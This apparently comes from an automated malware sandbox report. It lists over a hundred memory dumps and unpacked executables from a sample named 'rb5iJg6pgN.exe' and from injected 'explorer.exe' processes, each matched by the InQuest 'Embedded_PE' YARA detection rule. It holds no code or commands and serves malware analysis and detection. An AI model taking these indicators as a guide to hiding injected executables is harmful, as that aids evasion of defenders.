Source: 00000003.00000000.1538556444.05310000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000E.00000002.1686373712.000D0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1536262211.03CC0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000027.00000002.1736596250.000D0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000003.00000000.1540736146.070E0000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000018.00000002.1694247399.00640000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000E.00000002.1686572361.00470000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.1.rb5iJg6pgN.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.rb5iJg6pgN.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.rb5iJg6pgN.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.rb5iJg6pgN.exe.2d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 2.2.explorer.exe.60000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 2.2.explorer.exe.60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.rb5iJg6pgN.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.1.rb5iJg6pgN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 2.2.explorer.exe.650000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 2.2.explorer.exe.650000.2.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 2.2.explorer.exe.630000.1.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 2.2.explorer.exe.630000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.60000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.16f0000.2.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.16f0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.440000.1.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2d70000.13.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2de0000.14.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2de0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2e20000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2e20000.15.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2e60000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2e30000.16.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2e30000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3020000.18.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3020000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2e60000.17.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3080000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3080000.19.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3140000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3130000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1d70000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3140000.21.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.35f0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3600000.23.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3600000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.35f0000.22.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1d30000.4.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3af0000.24.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3c20000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3c30000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3c20000.26.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3c30000.27.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3d80000.29.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3d80000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3de0000.30.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3e20000.31.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3de0000.30.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3b70000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1d30000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1d70000.5.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1da0000.6.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3ea0000.34.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3e90000.33.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3ea0000.34.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3eb0000.35.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3af0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3eb0000.35.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3ee0000.36.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3ee0000.36.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3ef0000.37.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3f70000.38.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3ef0000.37.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.4150000.39.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.4150000.39.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3f70000.38.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.42c0000.40.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1a20000.3.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3e90000.33.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3e40000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.60000.43.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.60000.43.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3e20000.31.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3b70000.25.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.16f0000.45.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.16f0000.45.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.42c0000.40.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.440000.44.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1d70000.48.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1d30000.47.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1d30000.47.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1d70000.48.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1a20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1da0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1df0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1df0000.7.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1e00000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1e00000.8.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2020000.52.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1e00000.51.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.0.rb5iJg6pgN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1da0000.49.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2ba0000.53.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2ba0000.53.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2bc0000.54.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2d40000.55.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2d40000.55.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2d70000.56.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2d70000.56.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2bc0000.54.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2de0000.57.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2de0000.57.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2e20000.58.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2e20000.58.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2e60000.60.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3020000.61.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.440000.44.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3020000.61.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3080000.62.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3130000.63.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2020000.9.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3080000.62.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3130000.63.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3140000.64.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.35f0000.65.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3600000.66.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3600000.66.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3af0000.67.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.1df0000.50.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.3af0000.67.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.0.rb5iJg6pgN.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2ba0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2ba0000.10.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.70e0000.42.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 3.0.explorer.exe.2d40000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
